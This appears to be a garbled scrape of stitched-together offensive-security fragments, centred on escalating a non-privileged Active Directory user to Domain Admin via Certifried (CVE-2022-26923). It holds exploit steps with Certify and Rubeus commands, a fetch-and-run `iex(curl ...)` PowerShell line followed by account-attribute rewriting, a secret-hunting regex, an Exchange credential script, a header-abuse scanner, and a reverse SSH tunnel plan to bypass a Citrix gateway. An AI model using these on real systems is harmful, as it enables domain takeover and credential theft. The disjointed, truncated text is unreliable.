The screenshots were taken on different sessions.
The entire sessions are included on the screenshots.
I lost the original prompts, so I had to reconstruct them, and still managed to reproduce.
The "compressed" version is actually longer! Emojis and abbreviations use more tokens than common words.
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
| // This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
| # github.com/ndavison | |
| import requests | |
| import random | |
| import string | |
| from argparse import ArgumentParser | |
| parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.") | |
| parser.add_argument("-u", "--url", help="URL to target (without query string)") |
| iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
| Import-ActiveDirectory | |
| Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
| #in my testing i had to set dnshostname to $null first | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
| import os | |
| import glob | |
| import zipfile | |
| import requests | |
| from lastversion import latest | |
| tools = ["nuclei", "httpx", "dnsx", "subfinder", "naabu", "shuffledns"] | |
| def get_version(tools): | |
| for i in tools: |
I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (eg PuTTY). I am tasked to ensure this Citrix design is secure, and users can not access their Linux VM's or other resources on the internal private network in any way outside of using Citrix.
The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.
I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o
| import os | |
| import argparse | |
| from exchangelib import Credentials, Account, Configuration | |
| from exchangelib.errors import ErrorNonExistentMailbox, UnauthorizedError | |
| def args(): | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("-c", "--creds", dest="creds", help="List of known valid user credentials in the format user@acme.com:password", action='store', required=True) | |
| parser.add_argument("-t", "--target", dest="target", help="Target Exchange server.", action='store', required=True) | |
| args = parser.parse_args() |
| import requests | |
| import random | |
| import string | |
| import sys | |
| import time | |
| import requests | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def id_generator(size=6, chars=string.ascii_lowercase + string.digits): |
